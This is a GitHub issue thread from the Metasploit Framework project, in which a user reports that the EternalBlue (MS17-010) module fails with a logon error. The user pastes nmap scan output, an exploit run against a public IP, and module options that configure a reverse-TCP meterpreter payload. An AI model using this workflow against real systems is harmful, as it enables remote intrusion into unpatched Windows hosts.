rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

After updating exploits/windows/smb/ms17_010_eternalblue.rb I get this... error #8544

Closed kalifan closed 7 years ago

kalifan commented 7 years ago
RubySMB::Error::UnexpectedStatusCode: Error with login: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.

Before the update the exploit worked fine. I didn't need to use credentials. I could execute arbitrarily.

void-in commented 7 years ago

The target server might be updated and patched. Have you checked if it is still missing the KB? You can check it through wmic qfe get hotfixid | find "<MS17-010 KB for the OS>". You can find more info at https://support.microsoft.com/en-us/help/4023262/how-to-verify-that-ms17-010-is-installed

kalifan commented 7 years ago

@void-in Ey bro, thanks for answering me, but the target was checked using nmap and the script for the ms17-10 vulnerability, and the target is vulnerable. The victim machine is my computer from WAN. Any suggestions?

busterb commented 7 years ago

Do you have any target details (what OS, etc.)?

kalifan commented 7 years ago

@busterb Hi again, here is the information.

I am using nmap to check the vulnerability and information about the target.

Host is up (0.29s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
smb-os-discovery:
  OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
  OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
  Computer name: SECURITYV01
  NetBIOS computer name: SECURITYV01\x00
  Workgroup: WORKGROUP\x00
_ System time: 2017-06-15T20:35:03-05:00
smb-vuln-ms17-10:
  VULNERABLE:
  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    State: VULNERABLE
    IDs: CVE:CVE-2017-0143
    Risk factor: HIGH
      A critical remote code execution vulnerability exists in Microsoft SMBv1 servers (ms17-010).
    Disclosure date: 2017-03-14
    References:
      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
_     https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.0.106:4444
[*] 190.11.20.72:445 - Connecting to target for exploitation.
[-] 190.11.20.72:445 - RubySMB::Error::UnexpectedStatusCode: Error with login: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name                Current Setting  Required  Description
----                ---------------  --------  -----------
GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
GroomDelta          5                yes       The amount to increase the groom count by per try.
MaxExploitAttempts  3                yes       The number of times to retry the exploit.
ProcessName         explorer.exe     yes       Process to inject payload into.
RHOST               190.11.xx.xx     yes       The target address
RPORT               445              yes       The target port (TCP)
SMBDomain           .                no        (Optional) The Windows domain to use for authentication
SMBPass                              no        (Optional) The password for the specified username
SMBUser                              no        (Optional) The username to authenticate as
VerifyArch          true             yes       Check if remote architecture matches exploit Target.
VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.0.106    yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Windows 7 and Server 2008 R2 (x64) All Service Packs

thanks.

busterb commented 7 years ago

closing in favor of #8835